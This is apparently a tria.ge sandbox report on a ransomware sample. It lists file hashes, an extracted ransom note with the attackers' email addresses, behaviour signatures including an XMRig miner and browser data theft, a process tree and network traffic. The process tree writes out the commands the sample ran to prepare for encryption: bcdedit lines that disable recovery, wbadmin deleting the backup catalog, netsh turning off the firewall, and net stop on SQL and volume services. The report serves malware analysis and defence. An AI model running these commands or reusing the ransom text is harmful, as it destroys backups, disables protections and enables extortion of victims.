Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    66s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    28/05/2021, 17:48 UTC

General

  • Target

    sample.exe

  • Size

    1.3MB

  • MD5

    0e64acab6fb3d50aaebc17e6dfb2d289

  • SHA1

    c5c672a4a8ebae04cf7471c56136dce58ccd88f0

  • SHA256

    cd19340138f9eab48d20b3bf0a9dc6b4a6908d14cd48511ccefd6dba9e84705f

  • SHA512

    e797d31d7355d1f222a444fa934599582ffd9593185668382b9ad05ade1086d152f342305fb1b734a4cc0f691b2b4ba70fd8f183f77aa3f6f775a470fb4e7013

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\Decrypt-me.txt

Ransom Note
All Your Files Has Been Encrypted You Have to Pay to Get Your Files Back 1-Go to C:\ProgramData\ folder and send us prvkey*.txt.key file , * might be a number (like this : prvkey3.txt.key) 2-You can send some file little than 1mb for Decryption test to trust us But the test File should not contain valuable data 3-Payment should be with Bitcoin 4-Changing Windows without saving prvkey.txt.key file will cause permanete Data loss Our Email:poker021@mailfence.com in Case of no Answer:poker021@tutanota.com
Emails

Email:poker021@mailfence.com

Answer:poker021@tutanota.com

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Drops file in Drivers directory 9 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Drops startup file 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops desktop.ini file(s) 64 IoCs
  • Drops file in System32 directory 64 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 64 IoCs
  • NTFS ADS 3 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\sample.exe
    "C:\Users\Admin\AppData\Local\Temp\sample.exe"
    1⤵
    • Drops file in Drivers directory
    • Drops startup file
    • Drops desktop.ini file(s)
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1640
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c net stop MSDTC
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1208
      • C:\Windows\SysWOW64\net.exe
        net stop MSDTC
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1280
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop MSDTC
          4⤵
            PID:1236
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
        2⤵
          PID:1972
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c bcdedit /set {default} recoveryenabled no
          2⤵
            PID:1952
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c wbadmin delete catalog -quiet
            2⤵
              PID:1728
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c net stop SQLSERVERAGENT
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:1768
              • C:\Windows\SysWOW64\net.exe
                net stop SQLSERVERAGENT
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:1700
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop SQLSERVERAGENT
                  4⤵
                    PID:1628
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c net stop MSSQLSERVER
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:1464
                • C:\Windows\SysWOW64\net.exe
                  net stop MSSQLSERVER
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1484
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 stop MSSQLSERVER
                    4⤵
                      PID:1716
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c net stop vds
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1588
                  • C:\Windows\SysWOW64\net.exe
                    net stop vds
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1660
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 stop vds
                      4⤵
                        PID:328
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c netsh advfirewall set currentprofile state off
                    2⤵
                      PID:1812
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh advfirewall set currentprofile state off
                        3⤵
                          PID:1796
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c netsh firewall set opmode mode=disable
                        2⤵
                          PID:844
                          • C:\Windows\SysWOW64\netsh.exe
                            netsh firewall set opmode mode=disable
                            3⤵
                              PID:968
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c net stop SQLWriter
                            2⤵
                              PID:616
                              • C:\Windows\SysWOW64\net.exe
                                net stop SQLWriter
                                3⤵
                                  PID:520
                                  • C:\Windows\SysWOW64\net1.exe
                                    C:\Windows\system32\net1 stop SQLWriter
                                    4⤵
                                      PID:1372
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c net stop SQLBrowser
                                  2⤵
                                    PID:1108
                                    • C:\Windows\SysWOW64\net.exe
                                      net stop SQLBrowser
                                      3⤵
                                        PID:1800
                                        • C:\Windows\SysWOW64\net1.exe
                                          C:\Windows\system32\net1 stop SQLBrowser
                                          4⤵
                                            PID:1740
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c net stop MSSQLSERVER
                                        2⤵
                                          PID:1236
                                          • C:\Windows\SysWOW64\net.exe
                                            net stop MSSQLSERVER
                                            3⤵
                                              PID:1956
                                              • C:\Windows\SysWOW64\net1.exe
                                                C:\Windows\system32\net1 stop MSSQLSERVER
                                                4⤵
                                                  PID:1456
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c net stop MSSQL$CONTOSO1
                                              2⤵
                                                PID:1952
                                                • C:\Windows\SysWOW64\net.exe
                                                  net stop MSSQL$CONTOSO1
                                                  3⤵
                                                    PID:1696
                                                    • C:\Windows\SysWOW64\net1.exe
                                                      C:\Windows\system32\net1 stop MSSQL$CONTOSO1
                                                      4⤵
                                                        PID:1628
                                                • C:\Windows\system32\NOTEPAD.EXE
                                                  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Decrypt-me.txt
                                                  1⤵
                                                    PID:1208

                                                  Network

                                                  • flag-unknown
                                                    DNS
                                                    api.my-ip.io
                                                    sample.exe
                                                    Remote address:
                                                    8.8.8.8:53
                                                    Request
                                                    api.my-ip.io
                                                    IN A
                                                    Response
                                                    api.my-ip.io
                                                    IN A
                                                    157.245.5.40
                                                  • flag-unknown
                                                    GET
                                                    https://api.my-ip.io/ip
                                                    sample.exe
                                                    Remote address:
                                                    157.245.5.40:443
                                                    Request
                                                    GET /ip HTTP/1.1
                                                    Host: api.my-ip.io
                                                    Accept: */*
                                                    Response
                                                    HTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Fri, 28 May 2021 17:48:34 GMT
                                                    Content-Type: text/plain; charset=utf-8
                                                    Content-Length: 12
                                                    Connection: keep-alive
                                                    Cache-Control: no-store,no-cache
                                                    Pragma: no-cache
                                                    X-IP-Type: IPv4
                                                  • flag-unknown
                                                    DNS
                                                    x1.c.lencr.org
                                                    Remote address:
                                                    8.8.8.8:53
                                                    Request
                                                    x1.c.lencr.org
                                                    IN A
                                                    Response
                                                    x1.c.lencr.org
                                                    IN CNAME
                                                    crl.root-x1.letsencrypt.org.edgekey.net
                                                    crl.root-x1.letsencrypt.org.edgekey.net
                                                    IN CNAME
                                                    e8652.dscx.akamaiedge.net
                                                    e8652.dscx.akamaiedge.net
                                                    IN A
                                                    104.73.131.204
                                                  • flag-unknown
                                                    GET
                                                    http://x1.c.lencr.org/
                                                    Remote address:
                                                    104.73.131.204:80
                                                    Request
                                                    GET / HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Microsoft-CryptoAPI/6.1
                                                    Host: x1.c.lencr.org
                                                    Response
                                                    HTTP/1.1 200 OK
                                                    Server: nginx
                                                    Content-Type: application/pkix-crl
                                                    Last-Modified: Fri, 04 Sep 2020 00:34:32 GMT
                                                    ETag: "5f518b98-2cd"
                                                    Cache-Control: max-age=3600
                                                    Expires: Fri, 28 May 2021 18:48:34 GMT
                                                    Date: Fri, 28 May 2021 17:48:34 GMT
                                                    Content-Length: 717
                                                    Connection: keep-alive
                                                  • 157.245.5.40:443
                                                    https://api.my-ip.io/ip
                                                    tls, http
                                                    sample.exe
                                                    946 B
                                                    5.7kB
                                                    11
                                                    11

                                                    HTTP Request

                                                    GET https://api.my-ip.io/ip

                                                    HTTP Response

                                                    200
                                                  • 127.0.0.1:55097
                                                    sample.exe
                                                  • 127.0.0.1:55099
                                                    sample.exe
                                                  • 104.73.131.204:80
                                                    http://x1.c.lencr.org/
                                                    http
                                                    350 B
                                                    2.2kB
                                                    5
                                                    4

                                                    HTTP Request

                                                    GET http://x1.c.lencr.org/

                                                    HTTP Response

                                                    200
                                                  • 94.130.46.250:80
                                                    sample.exe
                                                    152 B
                                                    3
                                                  • 8.8.8.8:53
                                                    api.my-ip.io
                                                    dns
                                                    sample.exe
                                                    58 B
                                                    74 B
                                                    1
                                                    1

                                                    DNS Request

                                                    api.my-ip.io

                                                    DNS Response

                                                    157.245.5.40

                                                  • 8.8.8.8:53
                                                    x1.c.lencr.org
                                                    dns
                                                    60 B
                                                    165 B
                                                    1
                                                    1

                                                    DNS Request

                                                    x1.c.lencr.org

                                                    DNS Response

                                                    104.73.131.204

                                                  MITRE ATT&CK Enterprise v6

                                                  Replay Monitor

                                                  Loading Replay Monitor...

                                                  Downloads

                                                  • memory/1208-92-0x000007FEFB881000-0x000007FEFB883000-memory.dmp

                                                    Filesize

                                                    8KB

                                                  • memory/1796-76-0x0000000075631000-0x0000000075633000-memory.dmp

                                                    Filesize

                                                    8KB

                                                  We care about your privacy.

                                                  This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.